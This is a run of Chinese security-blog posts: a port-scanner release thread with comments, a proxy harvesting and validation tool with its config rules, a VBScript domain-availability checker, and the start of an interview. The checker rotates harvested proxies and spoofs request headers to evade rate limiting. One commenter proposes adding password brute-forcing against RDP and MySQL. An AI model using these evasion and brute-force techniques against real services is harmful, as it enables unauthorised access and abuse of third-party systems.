格式为:服务名|默认端口|正则 例 ftp|21|^220.*?ftp|^220- 正则为空时则使用端口进行匹配,否则以正则匹配结果为准。 效果图 下载地址:http://down.future-sec.com/F-NAScan.zip 项目地址:https://github.com/ywolf/F-NAScan 欢迎大家反馈建议和BUG [原文地址] 相关内容: King Of The Proxy (代理之王) v2.0,http/https/socks4/5代理采集/验证工具 批量检查域名是否已注册(抢注域名神器) 讨论:边界之后下一步你会做什么?内网渗透、局域网入侵 一个获取windows系统信息的批处理脚本 Jboss JMX/EJBInvokerServlet 批量检测工具 【APT】NodeJS 应用仓库钓鱼,大规模入侵开发人员电脑,批量渗透各大公司内网 批量扫描互联网无线路由设备telnet,并获取WIFI密码 Masscan:3分钟扫描整个互联网的极速扫描器 Nscan.py - Fast Network Scanner,高速网络扫描器,全网端口扫描神器 JS绕过代理、VPN获取真实IP及内网IP,逆向追踪 关于 linux shell 内网如何做代理 网站应用程序指纹识别工具,网站系统、脚本程序指纹识别工具 关于FTP弱口令扫描的,为什么经常见有人搞一些FTP弱口令扫描? 自制分布式漏洞扫描 安卓下有没有可以扫描内网中 手机型号活手机系统版本的? 跨过边界防火墙,我拿菜刀砍内网 社工个人电脑到内网渗透系列 一段通过WebRTC获取客户端内网IP的js (无需java/ActiveX支持) linux内网渗透一些乱写 欢迎大家讨论 InsightScan:Python多线程Ping/端口扫描 + HTTP服务/APP 探测 再谈内网渗透 King Of The Proxy (代理之王) v1.0 发布、HTTP代理采集、验证工具 Crazy Scan v1.0 - 疯狂扫描 v1.0 - 独立版 长安刺客 - 旁注杀手 v1.3 + Crazy Scan v1.0 - 疯狂扫描 v1.0,发布! Crazy Scan v1.0 - 疯狂扫描 v1.0 只用一行cmd命令扫描指定域名C段所有存活的主机 查找“CDN、负载均衡、反向代理”等大型网络真实IP地址的方法 PHP Web 木马扫描器 - 安全测试工具 长安刺客 - 旁注杀手 v1.2 版 + CDN 终结者 v1.1 发布 长安刺客 - 旁注杀手 v1.1 版发布,外加强力新功能:CDN 终结者 v1.0 物理攻击、抓频攻击 - 利用雷达来进行扫描网络弱点 扫描指定IP网段存在的网络摄像头、监控设备 【Bat】扫描内网指定用户能获取管理权限的机器 【VC源码】Wscan.exe 源码(网站目录/文件扫描) DEDE 0DAY 批量扫描程序 DEDE5.5批量拿shell工具 各种吐槽: 1# 园长 (喵~) | 2016-04-14 13:02 前排,支持狼狗 2# _Thorns (舍就是得。) | 2016-04-14 13:02 赞 3# 齐迹 (sec.zbj.com 欢迎来撸) | 2016-04-14 13:03 前排,支持狼狗 4# 小胖子 (z7y首席代言人,园长的表哥...) | 2016-04-14 13:03 前排,支持狼狗 5# Hackshy (嘘....告诉你个秘密) | 2016-04-14 13:05 感谢分享。 6# wolf (@伏宸安全) | 2016-04-14 13:05 @小胖子 @齐迹 @园长 你们都被谁带坏了 wolf = 狼 7# 闰土。 (骗我长胖 ?) | 2016-04-14 13:06 前排,支持狼狗 8# 路人N (?) | 2016-04-14 13:21 赞赞赞~ 9# 小牛牛 | 2016-04-14 13:25 牛逼,支持WOlf 10# Mystery。 (设计师一枚) | 2016-04-14 13:35 支持师傅 11# BloodSword | 2016-04-14 13:38 中排,支持狼狗 12# luwikes (土豆你个西红柿,番茄你个马铃薯~~~) | 2016-04-14 13:47 后排,支持狼狗 13# JiuShao | 2016-04-14 14:06 @wolf 我能来你们办公室走吗 我在你们楼下。 14# ver007 | 2016-04-14 14:07 输出效果不错拿来用用 15# DNS | 2016-04-14 14:10 @JiuShao 来来 16# JiuShao | 2016-04-14 14:15 @DNS 你们在了么 我真上来了哟 17# prolog (事了拂衣去,不收一分钱) | 2016-04-14 14:18 前排,支持狼狗 18# Azui | 2016-04-14 14:29 赞! 19# luwikes (土豆你个西红柿,番茄你个马铃薯~~~) | 2016-04-14 14:42 感谢楼主分享.提个小bug,不加-n参数的话会一直显示提示信息,可是提示信息里的-n参数写的是可选.. 20# HackBraid | 2016-04-14 14:44 这个比nmap好用吗 21# wolf (@伏宸安全) | 2016-04-14 14:50 @luwikes 测试不存在这个问题 发下你的环境信息看看 @HackBraid 比不上NMAP全面,但也有自己的优点 22# null_z | 2016-04-14 14:51 赞赞赞! py还有个nmap的包扫描结果是json格式的跟其他工具对接也超级棒。 23# rockes | 2016-04-14 14:59 为什么我在WIN10下面跑, F-NAScan.py 172.19.2.0 任何回显都没有 又弹出dos框呢?我的python版本是2.7 24# L.N. (http://ln.sycsec.com/) | 2016-04-14 15:03 必须点赞 25# wolf (@伏宸安全) | 2016-04-14 15:08 @rockes -h 172.19.2 26# 带馅儿馒头 (我就一小小小小鸟) | 2016-04-14 15:19 赞 27# newbie0086 | 2016-04-14 15:19 这个在内网配合插件自动化测试 效果一级棒 28# wolf (@伏宸安全) | 2016-04-14 15:23 @newbie0086 最近这2个工具都是在客户现场做渗透测试为了方便写出来的。 29# pyphrb (please called 强爷) | 2016-04-14 15:28 前排,支持狼狗 30# Master (小菜一枚) | 2016-04-14 15:40 冒泡 31# wolf (@伏宸安全) | 2016-04-14 15:44 @luwikes 解决这个问题了 https://github.com/ywolf/F-NAScan 重新下载试试 32# 凌零1 | 2016-04-14 16:15 后排学习 33# 好基友一辈子 | 2016-04-14 16:31 34# 好基友一辈子 | 2016-04-14 16:31 @wolf 权限是777 35# wolf (@伏宸安全) | 2016-04-14 16:35 @好基友一辈子 是不稳定吗? 超时调高一点试试看,默认为10秒。 36# wolf (@伏宸安全) | 2016-04-14 16:43 @好基友一辈子 在print 'Results output failure'上面加上print e 看看是什么错误信息 37# 路人N (?) | 2016-04-14 17:13 @wolf 帮你换了个皮肤(⌒▽⌒) 使用方法:把write_result函数改成下面的,扫描结束,打开这个文件http://paste.ubuntu.net/15825793/ def write_result(): try: content = "var servers="+str(json.dumps(re_data))+";\n" content += "var portdata="+str(json.dumps(port_data))+";\n" content += "var statistics="+str(json.dumps(statistics))+";\n" result = open("result.js","w") result.write(content) result.close() except Exception,e: print 'Results output failure' 效果图: 38# wolf (@伏宸安全) | 2016-04-14 17:14 @路人N 好评 39# 乌云小秘书 (第1.绝对不意气用事!第2.绝对不漏判任何一件坏事) | 2016-04-14 18:24 @路人N 666 40# 终于乌云了 | 2016-04-14 18:55 大赞 41# 白开水 | 2016-04-14 18:59 mark 42# scanf (www.scanfsec.com 网络尖刀) | 2016-04-14 19:08 可以打包成exe吗? 43# toomi | 2016-04-14 20:58 狼哥真是赞啊,学习了 44# Sai、 | 2016-04-14 21:22 内网探测很好用 45# 从容 (@寂寞的瘦子 其实是个死胖子!) | 2016-04-14 21:57 支持狼狗 46# LoveSnow (我要努力,争取开发自己的神器) | 2016-04-15 00:24 支持狼狗 47# LoveSnow (我要努力,争取开发自己的神器) | 2016-04-15 01:00 @路人N js获取的结果怎么进不来呢? 48# ADO (为啥我名字又短又简单,因为我智商低啊) | 2016-04-15 08:41 @路人N 非常好用,赞! @wolf 干的漂亮,Thanks! 49# cf_hb (10000定律<=>实践ing) | 2016-04-15 09:34 赞,以后内网探测就用这个小脚本了。 50# x1aoh4i (灰狗 、 就是灰狗) | 2016-04-15 09:42 后排,支持狼狗 51# 猪猪 | 2016-04-15 09:48 下载的压缩文件是损坏的? 52# wolf (@伏宸安全) | 2016-04-15 10:02 @猪猪 多谢提醒 重新上传了 @scanf 可以的 53# 好基友一辈子 | 2016-04-15 10:05 @wolf 应该是编码问题,扫描过程中web页面如果有乱码或者编码不同的时候会导致导出失败 54# 东方不败 (日出东方,唯我不败) | 2016-04-15 10:23 赞 结合路人甲的 内网以后不用了 55# 风之传说 | 2016-04-15 10:25 前后用了三个,一个没有指纹识别,一个打开报告有错误,还有一个需要加载其他的库。 这个接近完美了,在我看来。 感谢了一个。 56# 小葵 (burpsuite+metasploit就是我爹。) | 2016-04-15 11:40 大赞.. 不错不错 内网神器.. 收下啦. 自己改改代码... 省的自己再写了. 57# 东方不败 (日出东方,唯我不败) | 2016-04-15 14:06 @路人N 这个每次打开不同报告都要改名result.js么- -有不有直接封装html啊。。不然好麻烦啊@wolf 58# wolf (@伏宸安全) | 2016-04-15 15:24 @好基友一辈子 解决这个问题了 增加了编码识别环节,增加了忽略证书验证+容错 https://github.com/ywolf/F-NAScan 59# wolf (@伏宸安全) | 2016-04-15 16:12 @scanf 已经打包成独立exe文件 http://down.future-sec.com/F-NAScan.exe 60# 小歪 | 2016-04-15 17:20 可以放弃iisputscan了 61# 路人N (?) | 2016-04-15 17:37 @wolf @东方不败 http://paste.ubuntu.net/15846036/ 62# wolf (@伏宸安全) | 2016-04-15 22:05 @路人N 不错不错 63# 廷廷 (想法最重要) | 2016-04-15 23:47 不错支持共享 64# 指尖上的故事 | 2016-04-16 00:39 @wolf @路人N [img src="http://imgur.com/HBj1A8A" alt="报表"/] 提供一个思路:增加功能让这个更强大些(半自动化)。 port = '21,22,23,25,53,80,110,139,143,389,443,445,465,873,993,995,1080,1723,1433,1521,3306,3389,3690,5432,5800,5900,6379,7001,8000,8001,8080,8081,8888,9200,9300,9080,9999,11211,27017' 如果: 21 ftp 22 ssh 80 web 3389 rdp 3306 mysql 先是扫描出了开始IP段 & 结束IP段,然后比如扫描出来的某IP地址存在3389 3306 22 21 80 这些端口服务。 然后比如:3389弱口令字典爆破什么的在python中编写如下测试逻辑。 在然后比如:80 web端口可以用到的漏洞测试逻辑脚本加入到代码中。 然后比如:3306 mysql默认端口数据库首先检测远程端口是否开放,如果开放进行字典爆破或者根据SQL漏洞进行测试写入等等。 这样的话就更方便了,能写的话可以试试加入漏洞检测环节。 留言评论(旧系统): 佚名 @ 2016-04-17 08:36:31 竟然又活了。。。难得啊 本站回复: -_-!!! 不死牛 @ 2016-04-18 10:35:07 核总,还以为进去了呢。看到你又活了,真好 本站回复: -_-!!! 佚名 @ 2016-04-18 11:56:49 哇,这么快就出来,菊花变成向日葵了吧。 本站回复: 变成核弹发射井了,要不朝你来一发? 站长好 @ 2016-04-20 17:37:18 站长 你这网站记录了我哪些信息啊 浏览一个网站,网站都会记录哪些个人信息呢? 本站回复: 时间,IP,浏览的网址,浏览器类型,系统类型,以及一些基本系统信息。 佚名 @ 2016-04-23 10:29:52 忘记买春哥了 核总、 丞相我还不能死 本站回复: -_-!!! ...... 宝宝 @ 2016-04-26 00:04:09 核总居然没进去 本站回复: 进啥?现在天天替国安抓人,忙的都没时间更新网站……

2016/4/16
articleCard.readMore

King Of The Proxy (代理之王) v2.0,http/https/socks4/5代理采集/验证工具

King Of The Proxy (代理之王) v2.0 发布,HTTP/HTTPS、SOCKS4/5代理采集、验证工具。 时隔三年多,前段时间对代理之王进行了一些升级,老版本见(v1.0-v1.1): 2012-09-03 16:54:02:King Of The Proxy (代理之王) v1.0 发布、HTTP代理采集、验证工具 与老版本(v1.0-v1.1)相比: 1、开放代理采集接口,可自定义采集规则(正则匹配),兼容任何非加密文本输出的代理发布站。 2、开放代理验证接口,可自定义验证规则(正则匹配),支持直接自定义收发十六进制数据包,也就是说不止是 HTTP/HTTPS、SOCKS4/5 协议,甚至其他任何协议都可验证,你可以将十六进制数据包改为 MSSQL、MYSQL、RDP 等任何 TCP 协议,即可支持该种协议验证。当然,仅作为一个代理采集工具,这里用不到其他协议,如果你感兴趣的话,可以试试。 3、添加了对 SOCKS4/5 代理采集、验证的支持。 4、其他众多优化…… 用法: 很简单: C:\代理之王 v2.0>proxy -------------------------------------------------- King Of The Proxy v2.0 (代理之王) by: Nuclear'Atk qq: 624118310(root@lcx.cc) blog: https://lcx.cc/ usage: get 遍历 url.txt 中的链接及参数,抓取代理保存至:tmp.txt [追加] check 100 启动 100 个线程验证 tmp.txt,可用代理保存至:proxy.txt [追加] (线程数默认:100,最大 <= 1000) example: proxy.exe get proxy.exe check proxy.exe check 99 -------------------------------------------------- 采集规则(collect.ini): #################################################################################################### # 说明:该文件设定程序的采集规则,以“#”开始的为注释行,“[!]”为参数分隔符。 # # 格式:采集网址[!]代理类型[!]提取规则(正则表达式,不区分大小写,支持多行模式) # # 注意!只有IP地址(或域名)和端口同时匹配到才会保存!如:8.8.8.8:8888, www.google.com:9999 # # 例子:http://www.baidu.com/[!]http[!](\d+\.\d+\.\d+\.\d+)\:(\d+) # # http://www.baidu.com/[!]socks4[!](\d+\.\d+\.\d+\.\d+)\:(\d+) # # http://www.baidu.com/[!]socks5[!](\d+\.\d+\.\d+\.\d+)\:(\d+) # #################################################################################################### # 以下为 2015-12-2 16:58:27 更新的网址 http://www.xicidaili.com/[!]http[!]<td>(\d+\.\d+\.\d+\.\d+)</td>[\s]+?<td>(\d+)</td>[\s]+?<td>[^<>]+?</td>[\s]+?<td>[^<>]+?</td>[\s]+?<td>http http://www.xicidaili.com/[!]socks5[!]<td>(\d+\.\d+\.\d+\.\d+)</td>[\s]+?<td>(\d+)</td>[\s]+?<td>[^<>]+?</td>[\s]+?<td>[^<>]+?</td>[\s]+?<td>sock http://www.xicidaili.com/nn/[!]http[!]<td>(\d+\.\d+\.\d+\.\d+)</td>[\s]+?<td>(\d+)</td> http://www.xicidaili.com/nn/2[!]http[!]<td>(\d+\.\d+\.\d+\.\d+)</td>[\s]+?<td>(\d+)</td> http://www.xicidaili.com/nt/[!]http[!]<td>(\d+\.\d+\.\d+\.\d+)</td>[\s]+?<td>(\d+)</td> http://www.xicidaili.com/nt/2[!]http[!]<td>(\d+\.\d+\.\d+\.\d+)</td>[\s]+?<td>(\d+)</td> http://www.xicidaili.com/wn/[!]http[!]<td>(\d+\.\d+\.\d+\.\d+)</td>[\s]+?<td>(\d+)</td> http://www.xicidaili.com/wn/2[!]http[!]<td>(\d+\.\d+\.\d+\.\d+)</td>[\s]+?<td>(\d+)</td> http://www.xicidaili.com/wt/[!]http[!]<td>(\d+\.\d+\.\d+\.\d+)</td>[\s]+?<td>(\d+)</td> http://www.xicidaili.com/wt/2[!]http[!]<td>(\d+\.\d+\.\d+\.\d+)</td>[\s]+?<td>(\d+)</td> http://www.xicidaili.com/qq/[!]socks5[!]<td>(\d+\.\d+\.\d+\.\d+)</td>[\s]+?<td>(\d+)</td> http://www.xicidaili.com/qq/2[!]socks5[!]<td>(\d+\.\d+\.\d+\.\d+)</td>[\s]+?<td>(\d+)</td> 验证规则(check.ini): #################################################################################################### # 说明:该文件设定程序的验证规则, # # 以“#”开始的为注释行,花括弧“{}”之间的为有效数据(类似html语法)。 # # 格式:{开始标签}有效数据{/结尾标签} # # 注意:所有返回数据最大缓存 1048576 字节(1 MB),超过会被忽略,请尽量减小特征数据包! # #################################################################################################### # ------------------------------------------------------------------------------------------------ # # 全局参数设置(对以下所有类型代理验证都生效) # 1、设置错误重试次数 # 有时由于网络不稳定等原因,验证代理时会偶尔连接失败,导致误判,所以程序支持重试几次,以提高准确率。 # 注意:该功能对整体速度影响极大!整体耗时随重试次数成倍增加!推荐 1-2 即可,设置为 0 则不重试(最高速度)。 {retry}1{/retry} # 2、设置超时时间(单位:秒),可以过滤一些速度较慢的代理。 {timeout}10{/timeout} # ------------------------------------------------------------------------------------------------ # # HTTP/HTTPS 代理验证规则 # 1、首先向代理服务器发送以下数据(无空格十六进制): # GET http://www.baidu.com/robots.txt HTTP/1.1 {http-send}47455420687474703A2F2F7777772E62616964752E636F6D2F726F626F74732E74787420485454502F312E310D0A436F6E6E656374696F6E3A20436C6F73650D0A4163636570743A202A2F2A0D0A557365722D4167656E743A204D6F7A696C6C612F352E302028636F6D70617469626C653B204D53494520392E303B2057696E646F7773204E5420362E313B2054726964656E742F352E30290D0A486F73743A207777772E62616964752E636F6D0D0A0D0A{/http-send} # 2、如果返回数据(无空格十六进制)匹配以下正则(不区分大小写、支持多行模式),判定为有效代理并保存,无法访问或返回不符合数据的代理将被丢弃。 # Disallow: /shifen/ {http-regexp}.+446973616C6C6F773A202F73686966656E2F.+{/http-regexp} # ------------------------------------------------------------------------------------------------ # # Socks4 代理验证规则 # 1、首先向代理服务器发送以下数据(无空格十六进制): {socks4-send}040100350808080800{/socks4-send} # 2、如果返回数据(无空格十六进制)匹配以下正则(不区分大小写、支持多行模式),判定为有效代理并保存,无法访问或返回不符合数据的代理将被丢弃。 {socks4-regexp}^..5A.+${/socks4-regexp} # ------------------------------------------------------------------------------------------------ # # Socks5 代理验证规则 # 1、首先向代理服务器发送以下数据(无空格十六进制): {socks5-send}050100{/socks5-send} # 2、如果返回数据(无空格十六进制)匹配以下正则(不区分大小写、支持多行模式),判定为有效代理并保存,无法访问或返回不符合数据的代理将被丢弃。 {socks5-regexp}^0500${/socks5-regexp} # ------------------------------------------------------------------------------------------------ # 简要说明: proxy.exe:主程序,具体见程序内使用说明。 collect.ini:设定程序的采集规则,具体见文件内详细说明。 check.ini:设定程序的验证规则,具体见文件内详细说明。 tmp.txt:默认不存在,采集时会自动生成,采集结果保存至此文件,之后用于验证代理。 proxy.txt:默认不存在,验证代理的时自动生成,有效代理会保存于此文件。 高级玩法: 只需要使用一段批处理命令,配合端口扫描器或者采集方式,即可实现全天24小时自动采集/扫描、验证代理,瞬间搭建起一个轻量级代理发布站! 可以参照“为何互联网上会存在大量代理服务器?代理发布站的代理是哪里来的?”的内容,利用s等端口扫描器扫描海量IP的:8080、80、1080 等端口,然后使用本程序进行批量验证。 (过段时间,本站可能建立一个每天全自动实时更新的轻量级代理发布站,敬请关注!) 历史版本: 2012-09-03 16:54:02(v1.0-v1.1):King Of The Proxy (代理之王) v1.0 发布、HTTP代理采集、验证工具 下载地址: 客户订做,暂不公开。 如有需要,联系站长QQ:624118310(root@lcx.cc) 相关内容: JS绕过代理、VPN获取真实IP及内网IP,逆向追踪 【翻译】为什么会有免费代理? JSON探针—定位目标网络虚拟信息身份,利用大量三方网站cookie进行追踪 浅谈反向代理对SEO的影响 CVE-2014-0509 使用?半代理(0xD800~0xDBFF)的 Flash XSS 关于 linux shell 内网如何做代理 使用代理ip,浏览器会被网站获取到哪些信息?如何刷广告联盟不被发现? Asp反向代理程序,调用远程站点全站数据,一款脚本级反向代理程序 多层代理下解决链路低延迟的技巧,多层代理网络匿迹,反追踪,隐藏、保护自己 基于Wordpress Pingback的反追踪思路?木马远控通过“代理”上线? 只有webshell,一样可以做代理,如何使用脚本程序做代理 如何在网络中隐藏自己?再论拨了国外VPN代理,是否可被逆向追踪? 关于3G流量上网卡!(匿名上网),隐藏自己、网络匿迹、保护自己 反向代理的有趣用法 如何看两个ip是不是在一个机房,路由追踪 警告:用虚拟机上QQ,挂全局Socks代理的请注意,UDP协议暴露真实IP IP反查网站接口 旁站查询 IP查域名 域名历史解析记录查询 IP地址查机房AS号 反向代理在Web渗透测试中的运用 为何互联网上会存在大量代理服务器?代理发布站的代理是哪里来的? 基于日志整理出的经常扫描的 IDC、ISP、IP段、AS号及web服务器内容 King Of The Proxy (代理之王) v1.0 发布、HTTP代理采集、验证工具 WinHttpRequest SetProxy 方法详解,设置代理服务器信息 绕过CDN的思路,绕过CDN查找真实IP的思路,一个新颖并另类的方法 【需翻墙】网监如何爆菊?网警是如何通过层层VPN加密代理找到你的! Asp 防御CC攻击模块 (Anti-CC.asp) 查找“CDN、负载均衡、反向代理”等大型网络真实IP地址的方法 【文章】4.4 指定的确认者签名 4.5 代理签名 【Asp技巧】Asp绕过代理获取真实IP方法 【文章】Http代理穿透技术 留言评论(旧系统): 佚名 @ 2015-12-22 16:46:51 核总,放大招的节奏啊,啥时候来源现在这套BLOG源码啊? 本站回复: 写的一些小工具,blog最新版暂不开源…… -_-!!! 佚名 @ 2015-12-24 17:05:46 嗄哒,博主更新的很轻快啊 本站回复: -_-!!! 佚名 @ 2015-12-30 14:31:22 老树开新花 本站回复: -_-!!! 佚名 @ 2016-01-14 13:29:06 话说为什么没有linux版本...不开心 本站回复: -_-!!! 大邹 @ 2016-01-15 10:11:38 嗯嗯嗯 不会用 本站回复: -_-!!! 佚名 @ 2016-01-26 00:12:23 你就是一傻逼~还哥就是神~河公鸡 本站回复: 欢迎吐槽,你开心就好! 佚名 @ 2016-03-04 16:42:43 下载地址: 客户订做,暂不公开。 讲了半天用法,之后你告诉我不给用。。。。这不是耍流氓么 本站回复: -_-!!! 佚名 @ 2016-03-05 19:45:49 不错 给出了思路 用py实现起来应该不难 网站正则抓取 然后生成txt 但是有一个难点就在于怎么样去验证代理的地址是否存活…… 本站回复: good good study, day day up! 河公鸡 @ 2016-03-11 19:01:45 河公鸡 本站回复: [暂无回复] 佚名 @ 2016-03-15 20:02:39 居然打广告!!有内幕! 本站回复: -_-!!! kirry @ 2016-03-25 15:53:08 楼主很牛嘛 本站回复: -_-!!! 佚名 @ 2016-03-30 20:58:44 核总失踪啦?纯关心回复! 本站回复: 你猜~ 佚名 @ 2016-04-17 22:02:45 说好的 全自动实时更新的轻量级代理发布站 呢 本站回复: 开发中…… 佚名 @ 2016-07-02 13:41:10 2.0支持验证ip是否提供http、https代理么? 本站回复: [暂无回复]

2015/12/21
articleCard.readMore

批量检查域名是否已注册(抢注域名神器)

前段时间写的一个小脚本,用来检查大量域名注册情况,源码如下: Function echo(s) Wscript.Echo s End Function Public Function MidStr(s, a, b) '从指定字符串中截取两个字符串中间的字符:截取S中从A与B之间的字符串 Dim tmp IF InStr(s, a) > 0 And InStr(s, b) > 0 Then '判断特征字符是否存在 tmp = Mid(s, InStr(s, a) + Len(a)) '从s中截取所有a首次出现位置之后的字符 If InStr(tmp, b) > 0 Then '判断截取位置是否正确 tmp = Left(tmp, InStr(tmp, b) - 1) '在tmp中截取从开始到B首次出现位置之前的字符串 Else tmp = "" End IF End IF MidStr = tmp End Function Public Function FixStr(ByVal S) '删除字符串首尾空格、回车、换行 Do While Left(S, 1) = vbCr Or Left(S, 1) = vbLf Or Left(S, 1) = " " '删除字符串首:空格、回车、换行 S = Mid(S, 2) 'Echo Asc(Left(S, 1)) Loop Do While Right(S, 1) = vbCr Or Right(S, 1) = vbLf Or Right(S, 1) = " " '删除字符串尾:空格、回车、换行 S = Left(S, Len(S) - 1) 'Echo Asc(Right(S, 1)) Loop FixStr = S End Function Public Function GetRndItem(b) '从字符串数组中随机挑选一条 'Randomize 不能写在函数内部,会导致短时间间隔内相邻两次随机数一致,写在程序开始位置即可 GetRndItem = b(Int((UBound(b) - LBound(b) + 1) * Rnd + LBound(b))) '根据数组上、下标产生随机数,并获取该条数据 End Function Public Function RndNum(ByVal MinNum, ByVal MaxNum) '生成指定范围的随机数字(最小数,最大数):MinNum <= 返回值 <= MaxNum 'Randomize 不能写在函数内部,会导致短时间间隔内相邻两次随机数一致,写在程序开始位置即可 RndNum = Int((MaxNum - MinNum + 1) * Rnd + MinNum) '生成随机数字 End Function function geturl(url) Dim WinHttp Set WinHttp = CreateObject("WinHttp.WinHttpRequest.5.1") WinHttp.Open "GET", url, False '--------- '读取http代理列表(配合代理之王,防止封IP) if fso.FileExists("proxy.txt") then dim p p = split(FixStr(fso.OpenTextfile("proxy.txt", 1, False).Readall), vbcrlf) WinHttp.SetProxy 2, GetRndItem(p) '设置http代理 end if '--------- Randomize WinHttp.SetRequestHeader "Connection", "Close" WinHttp.SetRequestHeader "User-Agent", Int((99999999 * Rnd) + 11111111) WinHttp.SetRequestHeader "X-Forwarded-For", Int((255 * Rnd) + 1) & "." & Int((255 * Rnd) + 1) & "." & Int((255 * Rnd) + 1) & "." & Int((255 * Rnd) + 1) '--------- WinHttp.Send 'geturl = "status = " & WinHttp.Status & ", size = " & len(WinHttp.ResponseText) 'geturl = Bytes2BSTR(WinHttp.ResponseBody) geturl = WinHttp.ResponseText end function public function check(s) dim html, tmp html = geturl("http://panda.www.net.cn/cgi-bin/check.cgi?area_domain=" & s) if instr(html, "|216|") > 0 or instr(html, "<original>") = 0 then '|216|Query frequency is too high, please try again later check = html 'echo html 'wscript.quit else tmp = now & _ ", " & midstr(html, "<returncode>", "</returncode>") & _ ", " & midstr(html, "<key>", "</key>") & _ ", " & midstr(html, "<original>", "</original>") check = tmp fso.OpenTextFile(f, 8, True).WriteLine tmp end if end function '--------------------------------------------------------------------------------------------------- echo "--------------------------------------------------" echo "批量检查域名是否已注册(抢注域名神器)" echo "" echo "by: Nuclear'Atk" echo "qq: 624118310(root@lcx.cc)" echo "blog: https://lcx.cc/" echo "usage:" echo " cscript check.vbs mode number_start number_end domain_length domain_type" echo "example:" echo " cscript /nologo check.vbs order 1111 2222 5 .com" echo " cscript /nologo check.vbs random 1111 2222 5 .com" echo "--------------------------------------------------" on error resume next Randomize dim fso set fso = CreateObject("Scripting.FileSystemObject") '获取参数 if WScript.Arguments.Count <> 5 then '参数不对则退出 echo "arguments count error!" wscript.quit else dim m, s, e, l, t, f m = WScript.Arguments(0) '生成模式(随机或顺序) s = WScript.Arguments(1) '起始数字 e = WScript.Arguments(2) '结束数字 l = WScript.Arguments(3) '域名长度 t = WScript.Arguments(4) '域名后缀 f = l & t & ".txt" '日志文件名 end if '批量生成域名并查询 dim x select case m case "order" '按顺序产生 dim i for i = s to e x = right(replace(space(l), " ", "0") & i, l) & t '组成域名 if instr(fso.OpenTextfile(f, 1, False).Readall, x) = 0 then '只查询没查过的域名(判断日志文件中是否存在该域名) echo check(x) else echo now & ", " & x & ", pass..." end if next echo now & ", done!" case "random" '随机产生 do x = right(replace(space(l), " ", "0") & RndNum(s, e), l) & t '组成域名 if instr(fso.OpenTextfile(f, 1, False).Readall, x) = 0 then '只查询没查过的域名(判断日志文件中是否存在该域名) echo check(x) else echo now & ", " & x & ", pass..." end if loop case else echo "mode error!" end select -------------------------------------------------- 批量检查域名是否已注册(抢注域名神器) by: Nuclear'Atk qq: 624118310(root@lcx.cc) blog: https://lcx.cc/ usage: cscript check.vbs mode number_start number_end domain_length domain_type example: cscript /nologo check.vbs order 1111 2222 5 .com cscript /nologo check.vbs random 1111 2222 5 .com -------------------------------------------------- echo off & color a & cls rem setlocal EnableDelayedExpansion rem for /l %%i in (0,500,9999) do @( rem set /a sum=%%i+499 rem echo cscript check.vbs order %%i !sum! 4 .cc rem start cscript check.vbs order %%i !sum! 4 .cc rem ) for /l %%i in (1,1,10) do @( start cscript check.vbs random 0 99999 5 .cc ) rem pause King Of The Proxy (代理之王) v1.0 发布、HTTP代理采集、验证工具”,用法很简单,使用代理之王验证完IP后,结果保存到同目录“proxy.txt”(默认文件名)即可自动调用,防止IP被封。 使用的接口为万网接口:http://panda.www.net.cn/cgi-bin/check.cgi?area_domain=baidu.com 返回值及含义(每个域名后缀都不一样,自己测一下就知道了): 210 : Domain name is available 211 : Domain name is not available 212 : Domain name is invalid 214 : Unknown error 其他功能及用法,交给各位自己发现吧! 留言评论(旧系统): 佚名 @ 2015-12-17 23:41:26 ~ 本站回复: ~ 佚名 @ 2015-12-18 12:18:44 赞 本站回复: -_-!!! 夜行者 @ 2015-12-22 20:14:28 赞一个。 本站回复: 感谢! 佚名 @ 2016-02-12 11:22:55 本人用php写了一个万能的 本站回复: 恭喜恭喜 佚名 @ 2016-04-22 20:18:51 666 本站回复: 666 Any3ite @ 2016-04-25 14:21:56 我点了一下找答案,找到了答案 地上有130块钱你看到了没。 诶对了, 第17行代码有一个错误的地方, 反正我也不懂vbs我就瞎说了。 本站回复: 明明是 71 行好么,-_-!!!

2015/12/17
articleCard.readMore

【原稿】专访知名民间黑客“核攻击”:在自己的道路上,谱写自己的传奇

最近一直比较忙,没多余时间更新、管理博客,今天抽时间记录一下…… 这篇采访稿出来有一段时间了,前几天 T00ls.Net、和 FreeBuf.COM 进行了发布: T00ls.Net: 2015-12-10 15:11 官网文章:专访民间黑客核攻击:在自己的道路上,谱写自己的传奇【T00ls人物专访第四期】 2015-12-12 微信公众账号:专访民间黑客核攻击:在自己的道路上,谱写自己的传奇 FreeBuf.COM: 2015-12-13 官网文章:专访知名民间黑客“核攻击”:在自己的道路上,谱写自己的传奇 2015-12-13 微信公众账号:专访知名民间黑客“核攻击”:在自己的道路上,谱写自己的传奇 本文章由土司论坛(T00ls.Net)策划,T00ls 假说(js@t00ls.net)撰稿,在 T00ls、FreeBuf 都有发布,内容略有修改,以下为未修改原稿,留作记录。 【自述】 没有富二代的财富, 没有官二代的背景, 也没有军二代的后盾…… 我,核攻击,来自中国大西北一处普通的小山村,一个纯种屌丝~ 小时候的记忆已日渐模糊, 但依稀记得,那些年,那个家,还是全村著名的贫困户,以及每逢过年过节来讨债的大叔…… 不过,小时候学习还算争气,常年霸占年级前三,家里的土坯墙也因为贴满了各种奖状,显得金碧辉煌许多。 上学追逐戏闹,放学下河捉蟹,晚上在大户人家里蹭黑白电视看动画片…… 时光匆匆,岁月如梭,一晃眼到了初中时代…… 不负众望,如愿考上了当时县里名牌中学。 进了大县城,入了新学校,也在初一的微机课上第一次摸到了只在黑白电视中见过的计算机,头次知道还有电脑这种神奇的东西! 从此对它产生了浓厚的兴趣,闲暇时间翻阅各种教科书,逐行逐字看的如痴如醉。 课桌上的初中《信息技术》已快被翻烂,里边写满了各种笔记以及自己的心得体会,还在空白处手算二进制、八进制、十进制、十六进制,估计全校就我一个这么干吧,其他人都撕了折飞机…… 那时,每周最期待的事情就是上微机课,每次遇到新的问题、知识,就等着在下周的微机课上实践,当时一周只有一节课,有时还被其他老师占了…… 后来,应该是在初二吧,在 Word 97 中用 Visual Basic 语言写了人生中的第一个“hello, world”程序,当它成功运行时,兴奋了好几天! 再后来,渐渐地有了十块八块的零花钱,有次在报刊亭看新出的故事会,偶然间瞅到了一本关于黑客的杂志,当时还不知道黑客是什么,只是看到封面和计算机知识有关,一咬牙,拿一周的零食换了这本杂志回来!!! 然后放学火速奔回家,一头扎进去,一直看到半夜才看完,知识第一次被颠覆,原来计算机世界这么大!!! 从此一发不可收拾,什么《黑客X档案》、《黑客防线》、《黑客手册》、《大众电脑》之类的每周必买,当时只有一个报刊亭卖,每次还只有两三本,去迟了就没了! 